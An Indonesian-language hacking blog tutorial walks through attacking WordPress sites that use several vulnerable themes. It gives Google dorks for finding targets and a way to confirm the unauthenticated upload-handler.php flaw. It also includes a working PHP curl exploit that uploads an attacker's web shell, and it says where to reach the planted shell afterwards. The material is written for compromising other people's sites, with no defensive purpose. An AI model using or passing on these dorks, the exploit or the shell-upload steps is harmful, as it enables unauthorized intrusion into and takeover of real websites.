Assalamualaikum , Karena sudah lama tidak share Tutorial karena saya Sekarang Sibuk dalam Bekerja , Kali ini saya dapat Kesempatan Untuk Membuat Tutor lagi :)
Alhamdulillah :D
Oke , tanpa basa-basi , langsung saja .
Pertama , Karena Judulnya orange themes File Upload , Maka ada beberapa Themes yang Sama Vuln dengan itu ,
inurl:"
/wp-content/themes/bordeaux-theme/"
inurl:
"/wp-content/themes/bulteno-theme/"
inurl:
"/wp-content/themes/oxygen-theme/"
inurl:
"/wp-content/themes/radial-theme/"
inurl:
"/wp-content/themes/rayoflight-theme/"
inurl:
"/wp-content/themes/reganto-theme/"
inurl:
"/wp-content/themes/rockstar-theme/"
Sekarang , Gunakan 1 Dork Di atas .
Saya akan mengambil 1 Dork .
Yaitu :
inurl:"
/wp-content/themes/bordeaux-theme/"
Lalu , Jika Sudah dapat kan target , ex: www.site.com/wp-content/themes/bordeux-theme/
Anda tambahkan Vuln nya ,
/functions/upload-handler.php
Maka targetnya akan menjadi
www.site.com/wp-content/themes/bordeux-theme
/functions/upload-handler.php
Jika Keluar Error maka Site Itu Vuln :D
nah Sebelum mengeksekusikan Target ini , yang anda butuh kan adalah :
Xammp , Anda bisa download XAMMP di google, saya rasa sudah banyak bertebaran , lalu Install .
Jika Sudah , Buka Folder Xammp > terus buka lagi Folder PHP , Dan cari code PHP.INI , Tekan Control + F / CTRL + F , Ketikkan curl Lalu enter , jika ketemu Delete (;) Tanpa tanda kurung () , Lalu Jika tidak menemukan tanda ; ini berarti kamu sudah succes ..
Letakkan Shell Anda di Folder Xammp - Folder PHP , contoh Shell ex : up.php
Jika 3 cara diatas sudah selesai sekarang kita akan Mengeksekusikan Target ..
Copykan Exploit ini
<?php
$uploadfile
=
"upload.php"
;
$ch
= curl_init(
"http://127.0.0.1/wp-content/themes/rockstar-theme/functions/upload-handler.php"
);
curl_setopt(
$ch
, CURLOPT_POST, true);
curl_setopt(
$ch
, CURLOPT_POSTFIELDS,
array
(
'orange_themes'
=>
"@$uploadfile"
));
curl_setopt(
$ch
, CURLOPT_RETURNTRANSFER, 1);
$postResult
= curl_exec(
$ch
);
curl_close(
$ch
);
print
"$postResult"
;
?>
Dan Save dengan extention .php , Disini saya akan save dengan File bernama x.php , Simpan di dekat Folder Xammp - Folder PHP ..
Tepat dimana anda letak Shell anda tadi ..
Ingat , nama shell saya ada up.php
Maka di bagian exploit tadi
$uploadfile
=
"upload.php"
; <-- upload.php rename menjadi up.php
Jika sudah Save Kembali :))
Sekarang .
Buka Xammp Anda , Disini Jika xammp anda termasuk Versi lama , maka anda harus masuk ke folder xammp nya langsung
Cara nya
ketik : cd\ Lalu tekan Enter
Lalu Jika CMD anda kembali ke System C atau seperti ini
C:\Documents and Settings\Alliance>cd\
C:\>
Maka sudah berhasil , Sekarang selanjutnya tekan cd /xammp/php tekan Enter
Jika Sudah Jlankan Exploitnya , tadi nama Exploit saya adalah x.php maka cara menjalankannya seperti ini ..
cd:\xammp\php\>: php x.php Dan tekan Enter ..
Jika Keluar tulisan nama shell anda di CMD atau Command Promd tadi maka SUCCES xD
Shell acces , www.site.com/wp-content/uploads/2013/11/up.php
Jika masih bingung , Kamu bisa Commentar di blog ini .
:)
Sumber : http://dumaicodes.blogspot.com